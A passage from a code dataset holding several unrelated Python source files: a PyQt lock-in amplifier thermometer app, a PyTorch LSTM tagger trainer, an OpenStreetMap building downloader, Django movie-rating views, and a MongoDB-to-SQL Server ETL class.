self.visaCombo.setCurrentIndex(self.visaCombo.findText(s.value('sr830Visa', 'GPIB0::12', type=QString)))\n self.autoRangingCb.setChecked(s.value('autoRanging', True, type=bool))\n self.minSensitivityCombo.setCurrentCodeSilently(s.value('minSensitivity', 0, type=int))\n s.endGroup()\n s.endGroup()\n \n def loadParameterSets(self):\n s = QSettings()\n s.beginGroup('ParameterSets')\n names = s.childGroups()\n self.configCombo.addItems(names)\n \n def deleteParameterSet(self):\n i = self.configCombo.currentIndex()\n name = self.configCombo.itemText(i) \n \n s = QSettings()\n s.beginGroup('ParameterSets')\n s.beginGroup(name)\n s.remove('')\n s.endGroup()\n s.endGroup()\n \n self.configCombo.removeItem(i)\n \n \n def closeEvent(self, event):\n if self.timer:\n self.timer.stop()\n \n self.saveSettings()\n self.hkSub.stop()\n self.hkSub.wait(1000)\n \n def restoreSettings(self):\n s = QSettings()\n #visa = s.value('visa', QString(), type=QString)\n #i = self.visaCombo.findText(visa)\n #elf.visaCombo.setCurrentIndex(i)\n self.configCombo.setCurrentIndex(self.configCombo.findText(s.value('parameterSet', '', type=QString)))\n if len(self.configCombo.currentText()):\n self.loadParameterSet()\n #self.sensorNameLe.setText(s.value('sensorName', '', type=QString))\n \n def saveSettings(self):\n s = QSettings()\n #s.setValue('visa', self.visaCombo.currentText())\n s.setValue('parameterSet', self.configCombo.currentText())\n #s.setValue('sensorName', self.sensorNameLe.text())\n \n def enableWidgets(self, enable):\n self.visaCombo.setEnabled(enable)\n 
self.attenuatorGroupBox.setEnabled(enable)\n self.seriesResistanceGroupBox.setEnabled(enable)\n self.preampGroupBox.setEnabled(enable)\n self.sensorNameLe.setEnabled(enable)\n self.loadPb.setEnabled(enable)\n self.savePb.setEnabled(enable)\n self.deletePb.setEnabled(enable)\n self.configCombo.setEnabled(enable)\n \n def run(self):\n if self.sr830 is not None:\n self.stop()\n else:\n self.start()\n\n def stop(self):\n self.timer.stop()\n self.timer = None\n self.sr830 = None \n self.runPb.setText('Start')\n self.enableWidgets(True)\n del self.publisher; self.publisher = None\n \n def sensorName(self):\n return str(self.sensorNameLe.text())\n \n def start(self):\n sensorName = self.sensorName()\n self.setWindowTitle('Lock-In Thermometer %s' % sensorName )\n setAppId(sensorName)\n \n if sensorName == 'BusThermometer':\n icon = QIcon('Icons/LockinThermometer_Bus.ico')\n elif sensorName == 'RuOx2005Thermometer':\n icon = QIcon('Icons/LockinThermometer_BoxOutside.ico')\n elif sensorName == 'BoxThermometer':\n icon = QIcon('Icons/LockinThermometer_BoxInside2.ico')\n else:\n icon = QIcon('Icons/LockinThermometer.ico')\n\n self.setWindowIcon(icon)\n\n visa = str(self.visaCombo.currentText())\n self.sr830 = SR830(visa)\n #self.sr830.debug = True\n\n self.sr830.readAll()\n self.sr830.sineOut.caching = False # Disable caching on this\n \n self.publisher = ZmqPublisher('LockinThermometer', LockInPubSub(sensorName))\n self.startServerThread(LockInRequestReply(sensorName))\n \n self.runPb.setText('Stop')\n self.timer = QTimer()\n self.timer.setInterval(1000)\n self.timer.timeout.connect(self.snapSignal)\n self.timer.start()\n self.enableWidgets(False)\n self.rangeChangedTime = 0\n self.exChangedTime = 0\n t = time.time()\n timeString = time.strftime('%Y%m%d-%H%M%S', time.localtime(t))\n dateString = time.strftime('%Y%m%d')\n sensorName = str(self.sensorNameLe.text())\n\n s = QSettings('WiscXrayAstro', application='ADR3RunInfo')\n path = str(s.value('runPath', '', type=str))\n fileName = os.path.join(path, '%s_%s.dat' % (sensorName, dateString))\n if not os.path.isfile(fileName): # Maybe create new file\n with open(fileName, 'a+') as f:\n f.write('#LockinThermometer.py\\n')\n f.write('#Date=%s\\n' % timeString)\n f.write('#SensorName=%s\\n' % sensorName)\n f.write('#SR830=%s\\n' % self.sr830.visaId())\n f.write('#AttenuatorGain=%f\\n' % self.attenuatorGainSb.value())\n f.write('#AttenuatorSourceImpedance=%f\\n' % self.sourceImpedanceSb.value())\n f.write('#DriveResistance=%f\\n' % self.driveResistanceSb.value())\n f.write('#LeadResistance=%f\\n' % self.leadResistanceSb.value())\n f.write('#PreampGain=%f\\n' % self.preampGainSb.value())\n f.write('#DesiredExcitation=%f\\n' % self.sensorVoltageSb.value())\n k = self.sr830.allSettingValues()\n for key,value in k.iteritems():\n f.write('#SR830/%s=%s\\n' % (key,value))\n f.write('#'+'\\t'.join(['time', 'VsineOut', 'X', 'Y', 'f', 'Sensitivity', 'RxCalc', 'Rtherm'])+'\\n')\n self.fileName = fileName\n \n def snapSignal(self):\n t = time.time()\n try:\n self.sr830.snapSignal()\n except CommunicationsError as e:\n # TODO Log the error\n self.sr830.clearGarbage()\n return\n \n VsineOut = self.sr830.sineOut.value\n X = self.sr830.X\n Y = self.sr830.Y\n f = self.sr830.f\n\n rangeChangeAge = t - self.rangeChangedTime\n exChangeAge = t - self.exChangedTime\n \n sensitivity = self.sr830.sensitivity.value\n \n if self.autoRangingCb.isChecked():\n self.sr830.checkStatus()\n minCode = self.minSensitivityCombo.currentCode()\n currentCode = self.sr830.sensitivity.code\n if 
self.sr830.overload and rangeChangeAge > 10:\n self.sr830.sensitivity.code = currentCode+1\n self.rangeChangeTime = t\n elif abs(X) > 0.9*sensitivity and rangeChangeAge > 10:\n self.sr830.sensitivity.code = currentCode+1\n self.rangeChangedTime = t\n elif abs(X) < 0.3*sensitivity and rangeChangeAge > 10:\n if currentCode > minCode:\n self.sr830.sensitivity.code = currentCode - 1\n self.rangeChangedTime = t\n elif currentCode < minCode:\n self.sr830.sensitivity.code = minCode\n self.rangeChangedTime = t\n \n \n G1 = self.attenuatorGainSb.value()\n G2 = self.preampGainSb.value()\n Rsource = self.sourceImpedanceSb.value()\n Rd = self.driveResistanceSb.value()\n Rl = self.leadResistanceSb.value()\n Rs = Rsource+Rd+Rl\n\n Vx = X / G2\n \n Vex = VsineOut * G1 # Real excitation\n self.sensorVoltageIndicator.setValue(Vx)\n\n \n Rx = Rs / (Vex/abs(Vx)-1.)\n I = abs(Vx) / Rx\n self.sensorCurrentIndicator.setValue(I)\n P = abs(Vx)*I\n Temp = self.calibration.calculateTemperature([Rx])[0] # @todo This is really a crutch\n \n Tbase = self.calibration.correctForReadoutPower(Temp, P)\n \n if self.publisher is not None:\n if rangeChangeAge > 10 and exChangeAge > 10 and Temp == Temp and Temp > 0 and Temp < 10:\n self.publisher.publishDict(self.sensorName(), {'t': t, 'R': Rx, 'T': Temp, 'P': P, 'Tbase': Tbase})\n #self.publisher.publish('ADR_Sensor_R', Rx)\n #self.publisher.publish('ADR_Temperature', Temp)\n\n # Log data\n with open(self.fileName, 'a+') as of:\n of.write('%.3f\\t%.3f\\t%.5E\\t%.5E\\t%.3f\\t%.1E\\t%.5E\\t%.5E\\n' % (t, VsineOut, X, Y, f, sensitivity, Rx, self.Rthermometer))\n\n self.ts.append(t)\n self.xs.append(X)\n self.ys.append(Y)\n self.fs.append(f)\n self.VsineOuts.append(VsineOut)\n self.Rs.append(Rx)\n self.Vxs.append(Vx)\n self.Ps.append(P)\n self.Ts.append(Temp)\n self.Tbases.append(Tbase)\n\n self.sensorIndicator.setValue(Rx)\n self.temperatureIndicator.setKelvin(Temp)\n self.baseTempIndicator.setKelvin(Tbase)\n self.sensorPowerIndicator.setValue(P)\n self.updateLed.flashOnce()\n self.updatePlot()\n\n # Not sure where this code came from. 
Seems questionable (FJ)\n # if len(self.Ts) > 2 :\n # dTdt = abs((self.Ts[-1] - self.Ts[-2]) / (self.ts[-1] - self.ts[-2]))\n # if dTdt > 0.1:\n # self.temperatureIndicator.setKelvin('N/A')\n # self.stop()\n \n \n # Perhaps change excitation\n if exChangeAge < 10 or rangeChangeAge < 10 or not self.adjustExcitationCb.isChecked():\n return\n VxDesired = self.sensorVoltageSb.value()\n IDesired = VxDesired / Rx\n VexDesired = IDesired*(Rx+Rs)\n change = (VexDesired-Vex)/Vex\n tolerance = 1E-2*self.toleranceSb.value()\n if abs(change) < tolerance:\n return\n \n VsineOutDesired = VexDesired / G1 # This is what we would like to see\n # What we actually get may be something different\n Vnew = min(5,max(VsineOutDesired,0.004))\n if tolerance == 0 and abs(Vnew - VsineOut) > 0.009: # If a large step is required, do it slowly\n Vnew = (3.*VsineOut+1.*Vnew)/4.\n \n if abs(Vnew - VsineOut) < 0.002:\n return\n self.exChangedTime = t\n self.sr830.sineOut.value = Vnew\n \n def clearData(self):\n self.ts = []\n self.xs = []\n self.ys = []\n self.fs = []\n self.Rs = []\n self.Ps = []\n self.VsineOuts = []\n self.Vxs = []\n self.Ts = []\n self.Tbases = []\n self.updatePlot()\n \n def updatePlot(self):\n yAxis = self.plotYAxisCombo.currentText()\n pl = self.plot\n if yAxis == 'X':\n y = self.xs\n pl.setLabel('left', 'Lock-in X', 'V')\n elif yAxis == 'Y':\n y = self.ys\n pl.setLabel('left', 'Lock-in Y', 'V')\n elif yAxis == 'R':\n y = self.Rs\n pl.setLabel('left', 'R sensor', u'Ω')\n elif yAxis == 'V sine out':\n y = self.VsineOuts\n pl.setLabel('left', 'V sine out', 'V')\n elif yAxis == 'V sensor':\n y = self.Vxs\n pl.setLabel('left', 'V sensor', 'V')\n elif yAxis == 'P sensor':\n y = self.Ps\n pl.setLabel('left', 'P sensor', 'W')\n elif yAxis == 'Sensor temperature':\n y = self.Ts\n pl.setLabel('left', 'T sensor', 'K')\n elif yAxis == 'Base temperature':\n y = self.Tbases\n pl.setLabel('left', 'T base', 'K')\n \n x = self.ts\n self.curve.setData(x, y)\n\ndef setAppId(name):\n import ctypes\n myappid = u'WISCXRAYASTRO.ADR3.%s.1' % name # arbitrary string\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) \n \n\nif __name__ == '__main__':\n import logging\n logging.basicConfig(level=logging.WARN)\n \n from PyQt4.QtGui import QApplication\n app = QApplication([])\n app.setApplicationName('Lockin Thermometer')\n app.setApplicationVersion('0.2')\n app.setOrganizationDomain('wisp.physics.wisc.edu')\n app.setOrganizationName('McCammon X-ray Astrophysics')\n \n setAppId('LockInThermometer')\n \n mainWindow = LockinThermometerWidget()\n \n icon = QIcon('Icons/LockinThermometer.ico')\n mainWindow.setWindowIcon(icon)\n mainWindow.show()\n app.exec_()\n ","sub_path":"LockinThermometer.py","file_name":"LockinThermometer.py","file_ext":"py","file_size_in_byte":18238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
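The resistance computed in snapSignal is the series voltage divider solved for the sensor. With R_s = R_source + R_drive + R_lead, the divider gives

V_x = V_{ex}\,\frac{R_x}{R_x + R_s}
\quad\Longrightarrow\quad
R_x = \frac{R_s}{V_{ex}/\lvert V_x\rvert - 1}

which is the line Rx = Rs / (Vex/abs(Vx)-1.) in the code; the current and power indicators then follow from I = |V_x|/R_x and P = |V_x| I.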
+{"seq_id":"469214371","text":"#!/usr/bin/python\r\n# -*- coding: sjis -*-\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nimport pickle\r\n\r\n###################\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n##################\r\n\r\nwith open('dic.pkl','br') as f:\r\n dic = pickle.load(f)\r\n\r\nlabels = {'名詞': 0, '助詞': 1, '形容詞': 2,\r\n '助動詞': 3, '補助記号': 4, '動詞': 5, '代名詞': 6,\r\n '接尾辞': 7, '副詞': 8, '形状詞': 9, '記号': 10,\r\n '連体詞': 11, '接頭辞': 12, '接続詞': 13,\r\n '感動詞': 14, '空白': 15}\r\n\r\n# Data setting\r\n\r\nwith open('xtrain.pkl','br') as f:\r\n xtrain = pickle.load(f)\r\n\r\nwith open('ytrain.pkl','br') as f:\r\n ytrain = pickle.load(f)\r\n\r\n# Define model\r\n\r\nclass MyLSTM(nn.Module):\r\n def __init__(self, vocsize, posn, hdim):\r\n super(MyLSTM, self).__init__()\r\n self.embd = nn.Embedding(vocsize, hdim)\r\n self.lstm = nn.LSTM(input_size=hdim, hidden_size=hdim)\r\n self.ln = nn.Linear(hdim, posn)\r\n def forward(self, x):\r\n x = self.embd(x)\r\n lo, (hn, cn) = self.lstm(x)\r\n out = self.ln(lo)\r\n return out\r\n\r\n# model generate, optimizer and criterion setting\r\n\r\nnet = MyLSTM(len(dic)+1, len(labels), 100).to(device)\r\noptimizer = optim.SGD(net.parameters(),lr=0.01)\r\ncriterion = nn.CrossEntropyLoss()\r\n\r\n# Learn\r\n\r\nfor ep in range(1,11):\r\n loss1K = 0.0\r\n for i in range(len(xtrain)):\r\n x = [ xtrain[i] ]\r\n x = torch.LongTensor(x).to(device)\r\n output = net(x)\r\n y = torch.LongTensor( ytrain[i] ).to(device)\r\n loss = criterion(output[0],y)\r\n if (i % 1000 == 0):\r\n print(i, loss1K)\r\n loss1K = loss.item()\r\n else:\r\n loss1K += loss.item()\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n outfile = \"lstm0-\" + str(ep) + \".model\"\r\n torch.save(net.state_dict(),outfile)\r\n","sub_path":"pytorch-nlp/Chapter3/LSTM/lstm0.py","file_name":"lstm0.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"626882174","text":"import Config\nimport numpy as np\nimport lxml.etree as ET\nimport os, sys, time, requests\n\nclass BuildingListConstructor(object):\n\tdef __init__(self, num_vertices_range, filename = None):\n\t\tself.building = {}\n\t\tself.num_vertices_range = num_vertices_range\n\t\tassert(num_vertices_range[0] >= 3)\n\t\tassert(num_vertices_range[0] <= num_vertices_range[1])\n\t\tif os.path.exists(filename):\n\t\t\tself.loadBuildingList(filename)\n\t\tself.filename = filename\n\t\treturn\n\n\tdef getBuildingIDListSorted(self):\n\t\tli = [item for item in self.building]\n\t\tli.sort()\n\t\treturn li\n\n\tdef getBuilding(self, building_id):\n\t\treturn self.building[building_id]\n\n\tdef getBuildingList(self):\n\t\treturn [self.building[item] for item in self.building]\n\n\tdef saveBuildingList(self, filename):\n\t\tnp.save(filename, self.building)\n\t\treturn\n\n\tdef printBuildingList(self, show_list = False):\n\t\tif show_list:\n\t\t\tprint(self.building)\n\t\tprint('Totally %d buidings.' % len(self.building))\n\t\treturn\n\n\tdef loadBuildingList(self, filename):\n\t\td = np.load(filename).item()\n\t\tfor bid in d:\n\t\t\tif bid in self.building:\n\t\t\t\tassert(len(self.building[bid]) == len(d[bid]))\n\t\t\telse:\n\t\t\t\tbuilding = d[bid]\n\t\t\t\tif len(building) >= self.num_vertices_range[0] and len(building) <= self.num_vertices_range[1]:\n\t\t\t\t\tself.building[bid] = building\n\t\tself.printBuildingList()\n\t\treturn\n\n\tdef addBuildingList(self, left, up, right, down):\n\t\t# \n\t\twhile True:\n\t\t\ttime.sleep(1)\n\t\t\ttry:\n\t\t\t\tosm = requests.get(\n\t\t\t\t\t'http://www.openstreetmap.org/api/0.6/map?bbox=' + \\\n\t\t\t\t\t'%.7lf%%2C%.7lf%%2C%.7lf%%2C%.7lf' % (left, down, right, up)\n\t\t\t\t).content\n\t\t\t\tosm = ET.fromstring(osm)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tprint('Try again to get .osm file.')\n\t\t\t\ttime.sleep(10)\n\n\t\t# \n\t\tnode = {}\n\t\thole = {}\n\t\tfor item in osm:\n\t\t\tif item.tag == 'node':\n\t\t\t\tid_str = item.attrib.get('id')\n\t\t\t\tlon = item.attrib.get('lon')\n\t\t\t\tlat = item.attrib.get('lat')\n\t\t\t\tif id_str and lon and lat:\n\t\t\t\t\tnode[int(id_str)] = (float(lon), float(lat))\n\t\t\t\tcontinue\n\t\t\tif item.tag == 'relation':\n\t\t\t\tfor sub_item in item:\n\t\t\t\t\tif sub_item.tag == 'member':\n\t\t\t\t\t\tref = sub_item.attrib.get('ref')\n\t\t\t\t\t\trole = sub_item.attrib.get('role')\n\t\t\t\t\t\tif ref and role == 'inner':\n\t\t\t\t\t\t\thole[int(ref)] = None\n\n\t\t#\n\t\tfor item in osm:\n\t\t\tif item.tag == 'way':\n\t\t\t\tif item.attrib.get('visible') == 'true':\n\t\t\t\t\tnode_list = []\n\t\t\t\t\td = {}\n\t\t\t\t\tfor sub_item in item:\n\t\t\t\t\t\tif sub_item.tag == 'nd':\n\t\t\t\t\t\t\tref = sub_item.attrib.get('ref')\n\t\t\t\t\t\t\tif ref:\n\t\t\t\t\t\t\t\tnode_list.append(node[int(ref)])\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif sub_item.tag == 'tag':\n\t\t\t\t\t\t\tk = sub_item.attrib.get('k')\n\t\t\t\t\t\t\tv = sub_item.attrib.get('v')\n\t\t\t\t\t\t\tif k and v:\n\t\t\t\t\t\t\t\td[k] = v\n\t\t\t\t\tif 'building' in d:\n\t\t\t\t\t\tnode_list = node_list[: -1]\n\t\t\t\t\t\tif len(node_list) >= self.num_vertices_range[0] and len(node_list) <= self.num_vertices_range[1]:\n\t\t\t\t\t\t\tbid = int(item.attrib.get('id'))\n\t\t\t\t\t\t\tif bid in self.building:\n\t\t\t\t\t\t\t\tassert(len(self.building[bid]) == len(node_list))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif bid not in hole:\n\t\t\t\t\t\t\t\t\tself.building[bid] = node_list\n\t\treturn\n\n\tdef batchAddBuildingList(self, 
city_info):\n\t\tlon, lat = city_info['center']\n\t\tdx, dy = city_info['step']\n\t\tx1, x2 = city_info['xrange']\n\t\ty1, y2 = city_info['yrange']\n\t\tfor x in range(x1, x2):\n\t\t\tfor y in range(y1, y2):\n\t\t\t\tprint('Step', x, y)\n\t\t\t\tself.addBuildingList(\n\t\t\t\t\tleft = lon + dx * x,\n\t\t\t\t\tup = lat + dy * y,\n\t\t\t\t\tright = lon + dx * x + dx,\n\t\t\t\t\tdown = lat + dy * y + dy,\n\t\t\t\t)\n\t\t\t\tself.printBuildingList()\n\t\t\t\tself.saveBuildingList(self.filename)\n\t\treturn\n\nif __name__ == '__main__':\n\tassert(len(sys.argv) == 2)\n\tconfig = Config.Config()\n\tcity_name = sys.argv[1]\n\tobjCons = BuildingListConstructor(num_vertices_range = (4, 20), filename = './BuildingList%s.npy' % city_name)\n\tobjCons.batchAddBuildingList(config.CITY_COO[city_name])\n","sub_path":"DataPreparation/GetBuildingListOSM.py","file_name":"GetBuildingListOSM.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
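Hypothetical standalone usage (the city_info dict shape is taken from batchAddBuildingList; the coordinates, steps and ranges here are made up, and every grid step issues a live OpenStreetMap API request):

cons = BuildingListConstructor(num_vertices_range=(4, 20), filename='./BuildingListDemo.npy')
cons.batchAddBuildingList({
    'center': (8.5417, 47.3769),  # lon, lat
    'step': (0.01, 0.01),
    'xrange': (0, 2),
    'yrange': (0, 2),
})
print(cons.getBuildingIDListSorted()[:5])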
+{"seq_id":"241291242","text":"from django.db.models import Count, Avg\nfrom django.forms import model_to_dict\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import ListView\nfrom .models import Rating, Movie, Rater\nfrom django.contrib.auth.models import User\nfrom pymdb.forms import UserForm, RaterForm, RatingForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\n# TODO: Possible features:\n# Most active users (add to index using bootstrap columns)\n# Both in terms of most ratings and most reviews\n# Suggested movies\n# |-> Correlation curve using Pandas with generated similar movies\n# +Jumbotron image (requires css)\n# Alternating colors on rows, maybe tables? What layout would look good?\n\n# FIXME: Prevent multiple users from logging in simultaneously\ndef show_genre(request, genre_id):\n movies = Movie.objects.filter(genre=genre_id) \\\n .annotate(rating_avg=Avg('rating__rating')) \\\n .annotate(rating_count=Count('rating__rating')) \\\n .filter(rating_count__gte=10) \\\n .order_by('-rating_avg')[:20] # TODO: Add lt 10 movies separately\n genre = movies[0].genre\n return render(request,\n \"pymdb/genre.html\",\n {\"movies\": movies})\n\n\ndef index(request):\n # movies = Rating.top_rated(20)\n # movies = Movie.objects.values('id').annotate(rating_count=Count('rating')).order_by('-rating_count')[:20]\n # Employer.objects.values('id').annotate(jobtitle_count=Count('jobtitle')).order_by('-jobtitle_count')[:5]\n movies = Movie.objects.annotate(rating_avg=Avg('rating__rating')).annotate(\n rating_count=Count('rating__rating')).filter(\n rating_count__gte=10).order_by('-rating_avg')[:10]\n most_rated = Movie.objects.annotate(\n rating_avg=Avg('rating__rating')).annotate(\n rating_count=Count('rating__rating')).order_by('-rating_count')[:10]\n # counts = movies.\n # Item.objects.annotate(type_count=models.Count(\"type\")).filter(type_count__gt=1).order_by(\"-type_count\")\n\n # statuses = Status.objects.annotate(Count('favorite')).order_by('-posted_at')\n return render(request,\n \"pymdb/index.html\",\n {\"movies\": movies,\n \"most_rated\": most_rated,\n })\n\nclass MovieListView(ListView):\n template_name = \"pymdb/movie_list.html\"\n model = Movie\n context_object_name = 'movies'\n queryset = Movie.objects.annotate(rating_avg=Avg('rating__rating')).annotate(\n rating_count=Count('rating__rating')).filter(\n rating_count__gte=10).order_by('-rating_avg') # FIXME: How to speed up this query?\n paginate_by = 20\n header = \"Top Rated Movies\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"header\"] = self.header\n # if self.request.user.is_authenticated():\n # favorites = self.request.user.favorited_updates.all()\n # else:\n # favorites = []\n # context[\"favorites\"] = favorites\n return context\n\ndef show_rater(request, rater_id):\n rater = Rater.objects.get(pk=rater_id)\n # ratings = sorted(rater.my_ratings(), key=lambda x: x.rating, reverse=True)\n ratings = Rating.objects.filter(rater=rater).order_by('-time_added').select_related()\n return render(request,\n 'pymdb/user.html',\n {'rater': rater,\n 'ratings': ratings,\n })\n\n\n# FIXME: 'AnonymousUser' object has no attribute 'rater'\ndef show_movie(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n # ratings = movie.sorted_ratings()\n ratings = 
movie.rating_set.all().order_by('-time_added').select_related()\n num_ratings = movie.rating_count()\n\n # FIXME: Rewrite to use a single query instead of many\n try:\n rater = None\n rater = request.user.rater\n r = Rating.objects.get(rater=rater, movie=movie)\n except (ObjectDoesNotExist, AttributeError):\n r = None\n\n if request.method == \"GET\":\n if r:\n rating_form = RatingForm(instance=r)\n else:\n rating_form = RatingForm()\n elif request.method == \"POST\":\n if r:\n rating_form = RatingForm(request.POST, instance=r)\n else:\n rating_form = RatingForm(request.POST)\n # rating_form.rater = rater # Can't do this until after an uncommitted save...\n # rating_form.movie = movie\n if rating_form.is_valid() and not request.user.is_anonymous():\n # FIXME: Add error message for anon user trying to rate\n rating = rating_form.save(commit=False)\n rating.rater = rater\n rating.movie = movie\n # rating.save()\n # debug = [(x, getattr(rating_form, x)) for x in dir(rating_form)[65:]] #strike 4,65 >65 ok\n # debug2 = (dir(rating_form)[4], dir(rating_form)[65])\n # bug = 1/0\n rating_form.save()\n messages.add_message(request, messages.SUCCESS,\n \"Your rating has been saved. Thank you for contributing!\")\n\n\n return render(request,\n 'pymdb/movie.html',\n {'movie': movie,\n 'ratings': ratings,\n 'num_ratings': num_ratings,\n 'rating_form': rating_form,\n })\n\n\ndef user_register(request):\n if request.method == \"GET\":\n user_form = UserForm()\n rater_form = RaterForm()\n elif request.method == \"POST\":\n user_form = UserForm(request.POST)\n rater_form = RaterForm(request.POST)\n if user_form.is_valid() and rater_form.is_valid():\n user = user_form.save()\n rater = rater_form.save(commit=False)\n rater.user = user\n rater.save()\n\n password = user.password\n # The form doesn't know to call this special method on user.\n user.set_password(password)\n user.save()\n\n # You must call authenticate before login. :(\n user = authenticate(username=user.username,\n password=password)\n login(request, user)\n messages.add_message(\n request,\n messages.SUCCESS,\n \"Congratulations, {}, on creating your new account! You are now logged in.\".format(\n user.username))\n return redirect('index')\n return render(request, \"pymdb/register.html\", {'user_form': user_form,\n 'rater_form': rater_form})\n\n\nfrom django.contrib.auth import logout\n\n\ndef logout_view(request):\n logout(request)\n messages.add_message(request, messages.SUCCESS,\n \"You have successfully logged out of PyMDb.\")\n\n return redirect('index')\n\n# def rate(request, movie_id, user):\n# if request.method == \"GET\":\n# rating_form = RatingForm()\n# # FIXME: Add redirect here? Does this ever run?\n# elif request.method == \"POST\":\n# r = Rating.objects.get(pk=1)\n# rating_form = RatingForm(request.POST, instance=r)\n# if rating_form.is_valid():\n# rating = rating_form.save(commit=False)\n# rating.save()\n# # rater.user = user\n# # rater.save()\n# #\n# # messages.add_message(\n# # request,\n# # messages.SUCCESS,\n# # \"Congratulations, {}, on creating your new account! 
You are now logged in.\".format(\n# # user.username))\n# # return redirect('index')\n# return render(request, \"movie\", {'rating_form': rating_form, # FIXME: Add redirect\n# })\n# # return redirect('index')\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport matplotlib\nmatplotlib.style.use('ggplot')\n\ndef ratings_chart(request):\n ratings = Rating.objects.all()\n df = pd.DataFrame(model_to_dict(rating) for rating in ratings)\n df['count'] = 1\n df.index = df['time_added']\n counts = df['count']\n counts = counts.sort_index()\n series = pd.expanding_count(counts).resample('W', how=np.max, fill_method='pad')\n response = HttpResponse(content_type='image/png')\n\n fig = plt.figure()\n # ax = fig.add_subplot(111)\n # ax.plot(series)\n series.plot()\n plt.title(\"Total ratings over time\")\n plt.xlabel(\"\")\n canvas = FigureCanvas(fig)\n canvas.print_png(response)\n return response\n","sub_path":"movieratings/pymdb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
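The FIXME in show_movie asks for the current-user rating to be fetched without the try/except over two attribute errors. One possible shape, assuming the same Rating model and rater relation used above: .first() returns None instead of raising, so a single filtered query covers both the rated and unrated cases (get_user_rating is a hypothetical helper name).

def get_user_rating(request, movie):
    # guard first: AnonymousUser has no .rater (the crash noted in the FIXME above)
    if not request.user.is_authenticated():  # method call, as in this Django version
        return None
    return Rating.objects.filter(rater=request.user.rater, movie=movie).first()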
+{"seq_id":"217141194","text":"import datetime\nimport re\n\nimport pymongo\n\nfrom core.Mssql import Mssql\n\n\n# 操作MongoDB使用到了pymongo,应该先浏览一下官方的教程\n\nclass Mongodb:\n def __init__(self, db, collection, target, incremental=False):\n # 创建数据库连接,采取默认安装时没有用户名密码,所以可以不传参数\n self.client = pymongo.MongoClient()\n self.db = self.client[db]\n self.collection = self.db[collection]\n\n self.target = target\n self.incremental = incremental\n\n if target:\n target_table_name = target.table.name\n else:\n target_table_name = ''\n\n # 增量抽取的原理是在文档(表)中添加一个字段来标记是否导入过目标表\n self.incremental_record_name = '{}_to_{}'.format(self.collection,\n target_table_name)\n self.fields_map = {}\n self.filters = {}\n self.filters_tuple = []\n\n # 统计信息\n self.drop_count = 0\n self.merge_count = 0\n\n # 标签\n self.tag = None\n\n # 返回字符串表示\n def __str__(self):\n if self.db and self.collection:\n return 'Mongo:{}.{}'.format(self.db.name, self.collection.name)\n else:\n return 'Mongo'\n\n def add_map(self, source_name, target_name):\n if target_name not in self.target.get_current_table_detail():\n return False\n if target_name in self.fields_map:\n return False\n self.fields_map[target_name] = source_name\n return True\n\n # 请简单看一下mongodb/pymongo的查询语法\n def add_filter(self, source_name, filter_type, value):\n # float, int, date\n if filter_type == 'gt':\n self.filters[source_name] = {\n '$gt': value\n }\n # float, int, date\n elif filter_type == 'ge':\n self.filters[source_name] = {\n '$gte': value\n }\n # float, int, date\n elif filter_type == 'lt':\n self.filters[source_name] = {\n '$lt': value\n }\n # float, int, date\n elif filter_type == 'le':\n self.filters[source_name] = {\n '$lte': value\n }\n # float, int, bool, string, date\n elif filter_type == 'eq':\n self.filters[source_name] = {\n '$eq': value\n }\n # string\n elif filter_type == 'contain':\n self.filters[source_name] = re.compile(value)\n # string\n elif filter_type == 'notcontain':\n self.filters[source_name] = {\n '$not': re.compile(value)\n }\n\n # 提取到数据库\n def merge_to_target(self):\n merge_count = 0\n drop_count = 0\n for row in self.collection.find(self.filters):\n if self.incremental:\n # 如果id已经存在增量信息表中,丢弃\n if row.get(self.incremental_record_name):\n drop_count += 1\n continue\n # 更新增量信息表\n else:\n self.collection.update_one(\n {\"_id\": row[\"_id\"]},\n {\"$set\": {self.incremental_record_name: True}}\n )\n\n data = [(target_name, row.get(self.fields_map[target_name]))\n for target_name in self.fields_map]\n print(data)\n if not data:\n continue\n ins = self.target.table.insert()\n self.target.conn.execute(ins, dict(data))\n merge_count += 1\n self.merge_count = merge_count\n self.drop_count = drop_count\n\n\nif __name__ == '__main__':\n target = Mssql('sa', '132132qq', 'a')\n target.connect_db()\n target.set_table('studenta')\n mongo = Mongodb('fake', 'fake', target, incremental=True)\n mongo.add_map('name_mongo', 'name1')\n mongo.add_map('age_mongo', 'age1')\n mongo.add_map('salary_mongo', 'salary1')\n mongo.add_map('birthday_mongo', 'birthday1')\n mongo.add_filter('birthday_mongo', 'gt', datetime.datetime(2000, 1, 1))\n mongo.merge_to_target()\n","sub_path":"core/Mongodb.py","file_name":"Mongodb.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
